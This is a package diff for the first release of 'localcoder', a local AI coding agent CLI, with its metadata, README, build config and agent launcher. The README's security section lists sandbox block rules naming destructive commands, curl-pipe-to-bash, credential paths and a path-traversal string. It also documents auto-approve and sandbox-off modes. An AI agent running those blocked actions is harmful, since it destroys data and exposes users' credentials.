localcoder 0.1.0__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,7 @@
1
+ __pycache__/
2
+ *.pyc
3
+ *.egg-info/
4
+ dist/
5
+ build/
6
+ .eggs/
7
+ *.log
@@ -0,0 +1,4 @@
1
+ Apache License 2.0
2
+ Copyright 2026 Anass Kartit
3
+
4
+ Licensed under the Apache License, Version 2.0
@@ -0,0 +1,187 @@
1
+ Metadata-Version: 2.4
2
+ Name: localcoder
3
+ Version: 0.1.0
4
+ Summary: Local AI coding agent — auto-installs, auto-serves, zero config. Works with Gemma 4, Qwen 3.5, and any model via llama.cpp or Ollama.
5
+ Project-URL: Homepage, https://github.com/AnassKartit/localcoder
6
+ Project-URL: Repository, https://github.com/AnassKartit/localcoder
7
+ Author: Anass Kartit
8
+ License-Expression: Apache-2.0
9
+ License-File: LICENSE
10
+ Keywords: agent,ai,coding,gemma4,llama.cpp,local,localcoder,ollama,qwen
11
+ Classifier: Development Status :: 4 - Beta
12
+ Classifier: Environment :: Console
13
+ Classifier: Intended Audience :: Developers
14
+ Classifier: License :: OSI Approved :: Apache Software License
15
+ Classifier: Programming Language :: Python :: 3
16
+ Classifier: Topic :: Software Development :: Code Generators
17
+ Requires-Python: >=3.10
18
+ Requires-Dist: huggingface-hub>=0.20
19
+ Requires-Dist: prompt-toolkit>=3.0
20
+ Requires-Dist: rich>=13.0
21
+ Description-Content-Type: text/markdown
22
+
23
+ # localcoder
24
+
25
+ **The local coding CLI that does the obvious things nobody else does.**
26
+
27
+ ```bash
28
+ pipx install localcoder
29
+ ```
30
+
31
+ I wanted to paste a screenshot into my coding assistant and see it inline. No tool did that locally. So I built one.
32
+
33
+ ## Cost: $1.30/month vs $110/month
34
+
35
+ Running local saves 85-141x compared to cloud APIs:
36
+
37
+ | Usage | Claude Sonnet | Claude Opus | Local (US) | Local (India) |
38
+ |-------|--------------|-------------|------------|---------------|
39
+ | 4h/day | $55/mo | $91/mo | **$0.65/mo** | $0.29/mo |
40
+ | 8h/day | $110/mo | $183/mo | **$1.30/mo** | $0.58/mo |
41
+ | 10h/day | $137/mo | $228/mo | **$1.62/mo** | $0.72/mo |
42
+
43
+ *Based on: Gemma 4 26B at 47 tok/s, 30% active generation, M4 Pro 30W. Electricity: [worldpopulationreview.com](https://worldpopulationreview.com/country-rankings/cost-of-electricity-by-country). API: [anthropic.com](https://www.anthropic.com/pricing).*
44
+
45
+ **Annual savings: ~$1,300-$2,700** depending on usage and API choice.
46
+
47
+ ## What's Actually Different
48
+
49
+ | Feature | localcoder | aider | OpenCode | Claude Code |
50
+ |---------|-----------|-------|----------|-------------|
51
+ | Paste image, see it inline | **Ctrl+V → shows in terminal** | no | no | cloud only |
52
+ | Voice input (local) | **Ctrl+R → Whisper, no cloud** | no | no | no |
53
+ | See GPU memory while coding | **/gpu → live stats** | no | no | no |
54
+ | Computer use (screenshot + click) | **built-in** | no | no | cloud only |
55
+ | Free GPU when it's slow | **/clean → before/after** | no | no | n/a |
56
+ | Browse HuggingFace models | **built-in model browser** | no | no | n/a |
57
+ | Works offline | **100%** | partial | partial | no |
58
+ | Cost | **$0.00** | API costs | API costs | $20/mo+ |
59
+
60
+ ## Demo
61
+
62
+ ```
63
+ ❯ localcoder
64
+
65
+ localcoder · local AI coding agent · $0.00 forever
66
+
67
+ ┌──────────────────────────────────────────────────┐
68
+ │ LOCAL CODER │
69
+ └──────────────────────────────────────────────────┘
70
+
71
+ ● Gemma 4 26B Q3_K_XL · llama.cpp · 128K · ● GPU · 47 tok/s
72
+ ✓ offline · no API keys · no data sent
73
+
74
+ ctrl+r voice ctrl+v image /gpu stats /clean free /models switch
75
+
76
+ ❯ /gpu
77
+ GPU ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 12/16GB 3GB free
78
+ Swap 3GB Pressure normal
79
+ Model Gemma 4 26B Q3_K_XL GPU ctx 128K footprint 2311MB
80
+ ```
81
+
82
+ ## Benchmark — M4 Pro 24GB
83
+
84
+ Real tests, real hardware, no synthetic benchmarks:
85
+
86
+ | Model | Size | tok/s | Notes |
87
+ |-------|------|-------|-------|
88
+ | **Gemma 4 26B** Q3_K_XL | 12.0GB | 47 | Best overall — vision + tool calling |
89
+ | **Qwen3.5-35B** MoE Q2_K_XL | 11.3GB | 46 | Best coding quality |
90
+ | **Qwen3.5-4B** Q4_K_XL | 2.7GB | 46 | Quick tasks |
91
+ | Gemma 4 E4B Q4_K_M | 5.0GB | 56 | Fastest — good for 16GB Macs |
92
+ | ~~Qwen3.5-27B Dense~~ | ~~13.4GB~~ | ~~7~~ | ~~Swap thrashing — don't use on 24GB~~ |
93
+
94
+ ## Install
95
+
96
+ ```bash
97
+ # macOS (Apple Silicon)
98
+ pipx install localcoder
99
+
100
+ # First run — auto-detects hardware, shows what fits, starts model
101
+ localcoder
102
+ ```
103
+
104
+ Needs [llama.cpp](https://github.com/ggml-org/llama.cpp) or [Ollama](https://ollama.com). First run wizard handles this.
105
+
106
+ ## Commands
107
+
108
+ ```bash
109
+ localcoder # interactive coding
110
+ localcoder -p "build a react app" # one-shot
111
+ localcoder --yolo # auto-approve tools
112
+ ```
113
+
114
+ ### While Coding
115
+
116
+ | Command | What |
117
+ |---------|------|
118
+ | `Ctrl+V` | Paste + display image from clipboard |
119
+ | `Ctrl+R` | Toggle voice input (local Whisper) |
120
+ | `/gpu` | GPU memory, swap, model status |
121
+ | `/clean` | Free GPU memory with before/after |
122
+ | `/models` | Switch model (includes HuggingFace trending) |
123
+ | `/clear` | Clear conversation |
124
+
125
+ ### Also works with Claude Code
126
+
127
+ Don't want localcoder's agent? Use Claude Code with your local model instead:
128
+
129
+ ```bash
130
+ pip install localfit
131
+ localfit --launch claude --model gemma4-26b
132
+ ```
133
+
134
+ One command: starts model → configures Claude Code → launches with `--bare` flag.
135
+ See [localfit](https://github.com/AnassKartit/localfit) for details.
136
+
137
+ ### GPU Toolkit (localfit inside)
138
+
139
+ ```bash
140
+ localcoder --simulate # will this model fit my GPU?
141
+ localcoder --fetch unsloth/... # check all quants from HuggingFace
142
+ localcoder --bench # benchmark models on YOUR hardware
143
+ localcoder --health # GPU health dashboard
144
+ localcoder --config opencode # auto-configure OpenCode for local models
145
+ localcoder --config aider # auto-configure aider
146
+ ```
147
+
148
+ Also available standalone: `pipx install localfit`
149
+
150
+ ## Hardware
151
+
152
+ | Mac | RAM | Best Model | Speed |
153
+ |-----|-----|-----------|-------|
154
+ | Air M2 | 8 GB | Qwen 3.5 4B | 50 tok/s |
155
+ | Air M3 | 16 GB | Gemma 4 E4B | 57 tok/s |
156
+ | **Pro M4** | **24 GB** | **Gemma 4 26B Q3_K_XL** | **47 tok/s** |
157
+
158
+ ## License
159
+
160
+ Apache-2.0
161
+
162
+ ## Security
163
+
164
+ Sandbox mode is **ON by default**. Protects against destructive model outputs:
165
+
166
+ | Blocked | Examples |
167
+ |---------|----------|
168
+ | Destructive commands | `rm -rf`, `sudo`, `kill`, `mkfs` |
169
+ | Pipe to shell | `curl ... \| bash`, `wget ... \| sh` |
170
+ | Protected paths | `~/.ssh`, `~/.aws`, `~/.env`, `/etc/` |
171
+ | Path traversal | `../../etc/passwd` |
172
+ | Computer use | Disabled in sandbox |
173
+
174
+ ```bash
175
+ localcoder # sandboxed (default)
176
+ localcoder --yolo # auto-approve but sandbox ON
177
+ localcoder --unrestricted # sandbox OFF (shows warning)
178
+ ```
179
+
180
+ Approved tools are remembered across sessions (`~/.localcoder/approved_tools.json`).
181
+
182
+ ## Tests
183
+
184
+ ```bash
185
+ pip install pytest
186
+ pytest tests/ -v # 19 tests
187
+ ```
@@ -0,0 +1,165 @@
1
+ # localcoder
2
+
3
+ **The local coding CLI that does the obvious things nobody else does.**
4
+
5
+ ```bash
6
+ pipx install localcoder
7
+ ```
8
+
9
+ I wanted to paste a screenshot into my coding assistant and see it inline. No tool did that locally. So I built one.
10
+
11
+ ## Cost: $1.30/month vs $110/month
12
+
13
+ Running local saves 85-141x compared to cloud APIs:
14
+
15
+ | Usage | Claude Sonnet | Claude Opus | Local (US) | Local (India) |
16
+ |-------|--------------|-------------|------------|---------------|
17
+ | 4h/day | $55/mo | $91/mo | **$0.65/mo** | $0.29/mo |
18
+ | 8h/day | $110/mo | $183/mo | **$1.30/mo** | $0.58/mo |
19
+ | 10h/day | $137/mo | $228/mo | **$1.62/mo** | $0.72/mo |
20
+
21
+ *Based on: Gemma 4 26B at 47 tok/s, 30% active generation, M4 Pro 30W. Electricity: [worldpopulationreview.com](https://worldpopulationreview.com/country-rankings/cost-of-electricity-by-country). API: [anthropic.com](https://www.anthropic.com/pricing).*
22
+
23
+ **Annual savings: ~$1,300-$2,700** depending on usage and API choice.
24
+
25
+ ## What's Actually Different
26
+
27
+ | Feature | localcoder | aider | OpenCode | Claude Code |
28
+ |---------|-----------|-------|----------|-------------|
29
+ | Paste image, see it inline | **Ctrl+V → shows in terminal** | no | no | cloud only |
30
+ | Voice input (local) | **Ctrl+R → Whisper, no cloud** | no | no | no |
31
+ | See GPU memory while coding | **/gpu → live stats** | no | no | no |
32
+ | Computer use (screenshot + click) | **built-in** | no | no | cloud only |
33
+ | Free GPU when it's slow | **/clean → before/after** | no | no | n/a |
34
+ | Browse HuggingFace models | **built-in model browser** | no | no | n/a |
35
+ | Works offline | **100%** | partial | partial | no |
36
+ | Cost | **$0.00** | API costs | API costs | $20/mo+ |
37
+
38
+ ## Demo
39
+
40
+ ```
41
+ ❯ localcoder
42
+
43
+ localcoder · local AI coding agent · $0.00 forever
44
+
45
+ ┌──────────────────────────────────────────────────┐
46
+ │ LOCAL CODER │
47
+ └──────────────────────────────────────────────────┘
48
+
49
+ ● Gemma 4 26B Q3_K_XL · llama.cpp · 128K · ● GPU · 47 tok/s
50
+ ✓ offline · no API keys · no data sent
51
+
52
+ ctrl+r voice ctrl+v image /gpu stats /clean free /models switch
53
+
54
+ ❯ /gpu
55
+ GPU ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 12/16GB 3GB free
56
+ Swap 3GB Pressure normal
57
+ Model Gemma 4 26B Q3_K_XL GPU ctx 128K footprint 2311MB
58
+ ```
59
+
60
+ ## Benchmark — M4 Pro 24GB
61
+
62
+ Real tests, real hardware, no synthetic benchmarks:
63
+
64
+ | Model | Size | tok/s | Notes |
65
+ |-------|------|-------|-------|
66
+ | **Gemma 4 26B** Q3_K_XL | 12.0GB | 47 | Best overall — vision + tool calling |
67
+ | **Qwen3.5-35B** MoE Q2_K_XL | 11.3GB | 46 | Best coding quality |
68
+ | **Qwen3.5-4B** Q4_K_XL | 2.7GB | 46 | Quick tasks |
69
+ | Gemma 4 E4B Q4_K_M | 5.0GB | 56 | Fastest — good for 16GB Macs |
70
+ | ~~Qwen3.5-27B Dense~~ | ~~13.4GB~~ | ~~7~~ | ~~Swap thrashing — don't use on 24GB~~ |
71
+
72
+ ## Install
73
+
74
+ ```bash
75
+ # macOS (Apple Silicon)
76
+ pipx install localcoder
77
+
78
+ # First run — auto-detects hardware, shows what fits, starts model
79
+ localcoder
80
+ ```
81
+
82
+ Needs [llama.cpp](https://github.com/ggml-org/llama.cpp) or [Ollama](https://ollama.com). First run wizard handles this.
83
+
84
+ ## Commands
85
+
86
+ ```bash
87
+ localcoder # interactive coding
88
+ localcoder -p "build a react app" # one-shot
89
+ localcoder --yolo # auto-approve tools
90
+ ```
91
+
92
+ ### While Coding
93
+
94
+ | Command | What |
95
+ |---------|------|
96
+ | `Ctrl+V` | Paste + display image from clipboard |
97
+ | `Ctrl+R` | Toggle voice input (local Whisper) |
98
+ | `/gpu` | GPU memory, swap, model status |
99
+ | `/clean` | Free GPU memory with before/after |
100
+ | `/models` | Switch model (includes HuggingFace trending) |
101
+ | `/clear` | Clear conversation |
102
+
103
+ ### Also works with Claude Code
104
+
105
+ Don't want localcoder's agent? Use Claude Code with your local model instead:
106
+
107
+ ```bash
108
+ pip install localfit
109
+ localfit --launch claude --model gemma4-26b
110
+ ```
111
+
112
+ One command: starts model → configures Claude Code → launches with `--bare` flag.
113
+ See [localfit](https://github.com/AnassKartit/localfit) for details.
114
+
115
+ ### GPU Toolkit (localfit inside)
116
+
117
+ ```bash
118
+ localcoder --simulate # will this model fit my GPU?
119
+ localcoder --fetch unsloth/... # check all quants from HuggingFace
120
+ localcoder --bench # benchmark models on YOUR hardware
121
+ localcoder --health # GPU health dashboard
122
+ localcoder --config opencode # auto-configure OpenCode for local models
123
+ localcoder --config aider # auto-configure aider
124
+ ```
125
+
126
+ Also available standalone: `pipx install localfit`
127
+
128
+ ## Hardware
129
+
130
+ | Mac | RAM | Best Model | Speed |
131
+ |-----|-----|-----------|-------|
132
+ | Air M2 | 8 GB | Qwen 3.5 4B | 50 tok/s |
133
+ | Air M3 | 16 GB | Gemma 4 E4B | 57 tok/s |
134
+ | **Pro M4** | **24 GB** | **Gemma 4 26B Q3_K_XL** | **47 tok/s** |
135
+
136
+ ## License
137
+
138
+ Apache-2.0
139
+
140
+ ## Security
141
+
142
+ Sandbox mode is **ON by default**. Protects against destructive model outputs:
143
+
144
+ | Blocked | Examples |
145
+ |---------|----------|
146
+ | Destructive commands | `rm -rf`, `sudo`, `kill`, `mkfs` |
147
+ | Pipe to shell | `curl ... \| bash`, `wget ... \| sh` |
148
+ | Protected paths | `~/.ssh`, `~/.aws`, `~/.env`, `/etc/` |
149
+ | Path traversal | `../../etc/passwd` |
150
+ | Computer use | Disabled in sandbox |
151
+
152
+ ```bash
153
+ localcoder # sandboxed (default)
154
+ localcoder --yolo # auto-approve but sandbox ON
155
+ localcoder --unrestricted # sandbox OFF (shows warning)
156
+ ```
157
+
158
+ Approved tools are remembered across sessions (`~/.localcoder/approved_tools.json`).
159
+
160
+ ## Tests
161
+
162
+ ```bash
163
+ pip install pytest
164
+ pytest tests/ -v # 19 tests
165
+ ```
@@ -0,0 +1,36 @@
1
+ [build-system]
2
+ requires = ["hatchling"]
3
+ build-backend = "hatchling.build"
4
+
5
+ [project]
6
+ name = "localcoder"
7
+ version = "0.1.0"
8
+ description = "Local AI coding agent — auto-installs, auto-serves, zero config. Works with Gemma 4, Qwen 3.5, and any model via llama.cpp or Ollama."
9
+ readme = "README.md"
10
+ license = "Apache-2.0"
11
+ requires-python = ">=3.10"
12
+ authors = [{ name = "Anass Kartit" }]
13
+ keywords = ["localcoder", "ai", "coding", "agent", "llama.cpp", "ollama", "gemma4", "qwen", "local"]
14
+ classifiers = [
15
+ "Development Status :: 4 - Beta",
16
+ "Environment :: Console",
17
+ "Intended Audience :: Developers",
18
+ "Topic :: Software Development :: Code Generators",
19
+ "License :: OSI Approved :: Apache Software License",
20
+ "Programming Language :: Python :: 3",
21
+ ]
22
+ dependencies = [
23
+ "rich>=13.0",
24
+ "prompt_toolkit>=3.0",
25
+ "huggingface-hub>=0.20",
26
+ ]
27
+
28
+ [project.scripts]
29
+ localcoder = "localcoder.cli:main"
30
+
31
+ [tool.hatch.build.targets.wheel]
32
+ packages = ["src/localcoder"]
33
+
34
+ [project.urls]
35
+ Homepage = "https://github.com/AnassKartit/localcoder"
36
+ Repository = "https://github.com/AnassKartit/localcoder"
@@ -0,0 +1,2 @@
1
+ """localcoder — Local AI coding agent. Works with Gemma 4, Qwen 3.5, and any model."""
2
+ __version__ = "0.1.0"
@@ -0,0 +1,2 @@
1
+ from localcoder.cli import main
2
+ main()
@@ -0,0 +1,35 @@
1
+ """Agent runner — delegates to the localcoder agent script."""
2
+ import os, sys
3
+
4
+
5
+ def run_agent(api_base, model, args):
6
+ """Run the localcoder agent with the given config."""
7
+ os.environ["GEMMA_API_BASE"] = api_base
8
+ os.environ["GEMMA_MODEL"] = model
9
+
10
+ # Find the agent script — bundled with the package
11
+ script = os.path.join(os.path.dirname(__file__), "localcoder_agent.py")
12
+ if not os.path.exists(script):
13
+ # Fallback
14
+ script = os.path.expanduser("~/Projects/gemma4-research/localcoder")
15
+
16
+ if not os.path.exists(script):
17
+ from rich.console import Console
18
+ Console().print("[red]Agent script not found.[/]")
19
+ return
20
+
21
+ cmd = [sys.executable, script]
22
+ if args.prompt:
23
+ cmd += ["-p", args.prompt]
24
+ if args.cont:
25
+ cmd += ["-c"]
26
+ if args.model:
27
+ cmd += ["-m", model]
28
+ if args.yolo or args.bypass:
29
+ cmd += ["--yolo"]
30
+ if args.ask:
31
+ cmd += ["--ask"]
32
+ if args.api:
33
+ cmd += ["--api", api_base]
34
+
35
+ os.execvp(sys.executable, cmd)